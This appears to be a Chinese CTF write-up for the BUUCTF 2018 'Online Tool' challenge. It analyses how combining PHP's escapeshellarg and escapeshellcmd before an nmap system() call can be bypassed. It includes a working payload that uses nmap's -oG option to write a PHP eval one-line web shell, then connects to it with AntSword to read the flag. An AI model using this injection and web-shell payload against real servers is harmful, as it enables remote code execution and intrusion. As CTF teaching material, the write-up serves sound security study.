[BUUCTF 2018]Online Tool

文章探讨了PHP代码中关于IP地址获取及命令执行的潜在安全问题。通过分析escapeshellarg和escapeshellcmd函数的使用,揭示了如何可能通过nmap命令构造注入攻击,提到了利用一句话木马进行恶意操作的可能性,并给出了蚁剑连接查看flag的场景。
摘要由CSDN通过智能技术生成

在这里插入图片描述

环境开起来,事php代码审计题(恼),先来看前几行代码

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

目前感觉没啥用,就是平常的获取ip地址,先跳过

​来看看下面这几行

$host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);

escapeshellarg();escapeshellcmd();这个两个命令没见过,查一下,发现了这一篇文章,地址我贴下面了

https://paper.seebug.org/164/

escapeshellarg这个命令的作用有三

1.确保用户只传递一个参数给命令
2.用户不能指定更多的参数一个
3.用户不能执行不同的命令

因为mail的代码的问题,我先把mail的代码的内容贴出来

if (force_extra_parameters) {
    extra_cmd = php_escape_shell_cmd(force_extra_parameters);
} else if (extra_cmd) {
    extra_cmd = php_escape_shell_cmd(extra_cmd);
}

if (php_mail(to_r, subject_r, message, headers_trimmed, extra_cmd TSRMLS_CC)) {
    RETVAL_TRUE;
} else {
    RETVAL_FALSE;
}

也就是我们输入的命令其实是被处理了两次的,嗯?嘛,啊!我们现在来模拟一下我们输入的命令会受到什么样的处理:

  1. 传入的参数是:172.17.0.2’ -v -d a=1
  2. 经过escapeshellarg处理后变成了’172.17.0.2’‘’ -v -d a=1’,即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
  3. 经过escapeshellcmd处理后变成’172.17.0.2’\‘’ -v -d a=1’,这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义
  4. 最后执行的命令是curl ‘172.17.0.2’\‘’ -v -d a=1’,由于中间的\被解释为\而不再是转义字符,所以后面的’没有被转义,与再后面的’配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1’,即向172.17.0.2\发起请求,POST 数据为a=1’。
    有那个感觉了吧
    “有危险快移动”
    最下面还使用了echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
    这就有机可乘了,又是nmap命令,那么就可以用nmap搞事了,网上查一下发现-oG命令可以用
    那肯定传一句话木马咯 ?host=' <?php @eval($_POST["114514"]);?> -oG tshe.php '

这是什么,失忆木马?欸,传一下
在这里插入图片描述
然后蚁剑连接看一下目录就有flag了
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值